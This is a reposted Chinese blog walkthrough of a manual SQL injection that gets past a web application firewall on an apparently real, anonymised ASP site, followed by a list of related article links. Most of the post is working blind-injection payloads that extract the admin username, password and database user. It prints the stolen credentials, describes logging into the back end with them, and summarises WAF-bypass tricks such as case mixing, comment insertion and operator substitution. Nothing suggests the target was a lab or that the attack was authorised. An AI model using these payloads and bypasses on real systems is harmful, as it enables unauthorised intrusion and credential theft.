一次手工注入waf [转载]
转载自sss安全论坛
目标站点:http://www.xxx.cn:88
注入点:
http://www.xxx.cn:88/new/details1.asp?n_id=49909
对其进行检测:http://www.xxx.cn:88/new/details1.asp?n_id=49909’
发现有waf,测试and 1=1 和 and 1=2 , and 和 = 也被检测出来,
尝试大写和like代替and
Payload:http://www.xxx.cn:88/new/details1.asp?n_id=49909 And 1 like 1
Payload:http://www.xxx.cn:88/new/details1.asp?n_id=49909 And 1 like 2
... Select Top 1 len(admin) from admin)>5 返回正常
... Select Top 1 len(admin) from admin)>6 返回错误 说明len(admin)=6
以相同的方法得到len(password)=10,len(user)=3
猜解字段的值:
与猜解字段同理
Payload: http://www.xxx.cn:88/new/details1.asp?n_id=49909 And (Select Top 1 unicode(substring(admin,1,1)) from admin)>119 返回正确
Payload: http://www.xxx.cn:88/new/details1.asp?n_id=49909 And (Select Top 1 unicode(substring(admin,1,1)) from admin)>120 返回错误
说明admin字段记录的第一个字符打ascii是120
Payload: http://www.xxx.cn:88/new/details1.asp?n_id=49909 And (Select Top 1 unicode(substring(admin,N,1)) from admin)>n N [1,6]
依次测出admin六个字符的ascii值,查表得 admin=xuancb
根据上述方法测的password=118000jjtu, user=dbo (数据库管理员)
扫到后台后用admin和password登录
心得:在手工测试中无可避免地要与waf...打交道,是件很头疼的事,但机器总归机器,我们灵活运用大小写混杂、注释符混杂、多重编码、等价替换等方法还是可以绕过的。
大小写混杂: and----->And,select->Select,...
注释符混杂(安全狗可过):and/**a*/order by ,union/**a*/select...
宽字符:当网站对 ’ 转义 / ’ 时,使用%5d’ 会被编码两次 打到注入目的。
一些常见的等见 “=” = like, and = && , or = ||
这篇文章还是很不错的一个典型bypass waf的案例。涨姿势了。
转载于:https://www.cnblogs.com/xishaonian/p/6075506.html
一次手工注入waf [转载]相关推荐
- 记一次MySQL手工注入
本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎) 小 ...
- 教程是php手工注入
大家好,今天给大家带的教程是php手工注入,看了这个教程你会在不用工具的情况下, 拿下一般的php网站!!! 目标网站:http://www.atextile.org.cn:81 注入点: http ...
- 【运维安全】-MySQL手工注入
为什么要学习手工注入? 工具:sqlmap万能密码,直接登录到后台页面,不需要密码:admin' or 1=1#,当后台存在注入的话,才能使用注入密码,不是所有的网站进行登录. 当输入admin,ad ...
- Access手工注入
access手工注入 哈哈哈哈,,,我顾北清又回来啦,接着更新. 实验环境:win2008R2虚拟机,物理机(也就是我的win10). 搭建环境用的是access+asp源码. 环境搭建可以参照这里, ...
- 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...
- 某网站安全检测之数据库手工注入
某网站安全检测之数据库手工注入 一.引子 长夜慢慢,无心睡眠-- 无意中翻到几年前听的一首名为<祖先的阴影>的摇滚,这么长久的历史,混合着许多的罪恶与功绩:这么"灿 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- 全网最全的SQL手工注入总结!(收藏这篇就够了!)
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要.本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册 ...
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
最新文章
- linux简单目录,Linux下各目录简单整理
- 计算机网络分类(按覆盖范围分类)“名称、范围”
- 比特币要升级成为“比特币现金”
- 如果你现在学Android---学习使用Kotlin进行Android开发
- 辅助Visual Studio 2017部署的DevOps新工具
- Codeforces Round #453 (Div. 1) D. Weighting a Tree 构造 + dfs树
- 【Matlab】设置绘图窗口大小及颜色
- python求数组标准差
- windows 7 下 .net 开发环境的搭建
- 一文掌握 Docker 技术体系
- java中映射getproperty,PropertyUtils.getProperty和PropertyUtils.setProperty的用法详解
- 推荐Python、Django中文文档地址
- 2022年NPS基准:NPS分数达到多少算好?
- ruoyi框架集成magic-api
- java外卖项目介绍_JavaWeb网上订餐系统项目
- Seaweeds配置部署
- Unity实现瞄准镜效果
- C#基于虹软SDK的人脸识别签到系统
- c/c++ sprintf sprintf_s
- 视频编解码标准情况概述